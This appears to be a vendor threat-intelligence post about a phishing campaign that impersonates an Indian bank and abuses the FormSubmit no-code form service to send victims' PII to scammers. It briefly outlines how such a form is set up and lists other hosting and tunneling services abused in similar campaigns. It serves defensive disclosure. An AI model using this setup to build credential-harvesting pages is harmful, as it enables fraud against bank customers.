Scammers Misuse FormSubmit SaaS Platform to Steal PII of Indian Banking Customers

CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
Updated on
February 27, 2023
Published on
December 14, 2022
Read time
5
Subscribe to the latest industry news, technologies and resources.
Category: Adversary Intelligence Industry: Banking and Finance Motivation: Financial Region: Asia & Pacific

Executive Summary

THREAT IMPACT MITIGATION
  • Scammers use a free form service provider with no code integration to forward victims’ PII information to a verified email.
  • Using this scammers can steal banking credentials and PII.
  • Stolen PII details can be used to fuel various social engineering campaigns
  • Victims can be exploited financially.
  • Use XVigil to actively track events and take the necessary actions.
  • Educate customers about such fraudulent activities through various social media posts.

Analysis and Attribution

  • CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
  • FormSubmit is a no-code form service, designed to send input data from an HTML form straight to a specified email address.
  • This campaign was uncovered while analyzing a suspect domain which was classified as a threat by XVigil on 10 November 2022.

Information from the Fake Domain

  • The following information was gathered from the WHOIS records:
    • Creation Date: 08 November 2022
    • Updation Date: 08 November 2022
    • Domain Registrar: GoDaddy

Using FormSubmit to Create a Phishing Page

FormSubmit requires no integration but a designed form for a website and it can be set up within 3 steps:
  1. Connecting  form in the hosted website
  2. Include attributes in all form elements (like <input>, <select> and <textarea>) to receive the submission data
  3. First-time submission of the form requires a user to confirm the specified email address.
[caption id="attachment_22008" align="alignnone" width="1920"]Screenshot of the website of FormSubmit Screenshot of the website of FormSubmit[/caption] Similar Phishing Campaigns
  • Scammers are rapidly adopting newer technologies and abusing services/features provided by various SaaS platforms.
  • In 2022, CloudSEK observed a new trend of abusing domain forwarding services(mostly freemium) offered by web hosting providers to host phishing pages.
  • These campaigns are usually targeted at Indian banking customers.
  • Previously the following services were abused by threat actors for their campaigns:
  • Reverse tunneling services  offered by ngrok, TryCloudflare, LocalHostRun and more.
  • Cloudflare Pages
  • Hostinger’s Preview Domain
  • A2 Hosting’s Services

References

Appendix

[caption id="attachment_22009" align="alignnone" width="1412"]Screenshot of the phishing website used by scammers to steal customers’ PII details Screenshot of the phishing website used by scammers to steal customers’ PII details[/caption]    

Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Related Intelligence Posts
No items found.